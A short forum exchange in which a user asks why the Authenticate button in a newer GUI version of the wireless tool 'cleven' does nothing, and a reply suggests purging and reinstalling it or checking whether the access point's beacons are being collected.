When the GUI came out, I began understanding a little more of what I was doing and why, but I'm still not catching 100% of it :s

It did work before with the older versions of cleven :/

I tried to run within xterm, but it doesn't show me anything when I click on the Authenticate button...

How can I find out why this is happening?

if it does then possible you need to uninstall (purge) cleven & re-installed it....
if the beacons is not collected then its the AP prblm not from cleven....
